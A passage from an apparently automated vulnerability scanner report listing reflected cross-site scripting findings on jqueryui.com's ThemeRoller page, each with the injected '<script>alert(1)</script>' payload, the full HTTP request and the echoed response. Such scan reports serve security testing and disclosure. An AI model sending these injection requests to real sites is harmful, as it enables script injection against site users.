The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b6fb"><script>alert(1)</script>9fead6d3d2a was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=654b6fb"><script>alert(1)</script>9fead6d3d2a&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:04:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=654b6fb"><script>alert(1)</script>9fead6d3d2a&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColo
...[SNIP]...

4.593. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a49f"><script>alert(1)</script>e2dd7647322 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=758a49f"><script>alert(1)</script>e2dd7647322&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:01:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=758a49f"><script>alert(1)</script>e2dd7647322&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefaul
...[SNIP]...

4.594. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64d65"><script>alert(1)</script>b2f2024e930 was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=7564d65"><script>alert(1)</script>b2f2024e930&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:02:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=7564d65"><script>alert(1)</script>b2f2024e930&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgC
...[SNIP]...

4.595. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ea1d"><script>alert(1)</script>17d3870f713 was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=955ea1d"><script>alert(1)</script>17d3870f713&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:05:41 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=955ea1d"><script>alert(1)</script>17d3870f713&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png
...[SNIP]...

4.596. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1374"><script>alert(1)</script>39f6c08697f was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75a1374"><script>alert(1)</script>39f6c08697f&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:00:33 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75a1374"><script>alert(1)</script>39f6c08697f&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=22
...[SNIP]...

4.597. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0b60"><script>alert(1)</script>13f84838c4b was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55b0b60"><script>alert(1)</script>13f84838c4b&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:05:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55b0b60"><script>alert(1)</script>13f84838c4b&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a
...[SNIP]...

4.598. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42e74"><script>alert(1)</script>29c3c2098a8 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=7542e74"><script>alert(1)</script>29c3c2098a8&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:03:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=7542e74"><script>alert(1)</script>29c3c2098a8&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgC
...[SNIP]...

4.599. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86d04"><script>alert(1)</script>ac048d79a1b was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=086d04"><script>alert(1)</script>ac048d79a1b&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:06:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=086d04"><script>alert(1)</script>ac048d79a1b&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="te
...[SNIP]...

4.600. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3880d"><script>alert(1)</script>af0b4bd8dde was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=03880d"><script>alert(1)</script>af0b4bd8dde&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:07:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=03880d"><script>alert(1)</script>af0b4bd8dde&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

4.601. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0de2"><script>alert(1)</script>ab3d44f3d57 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

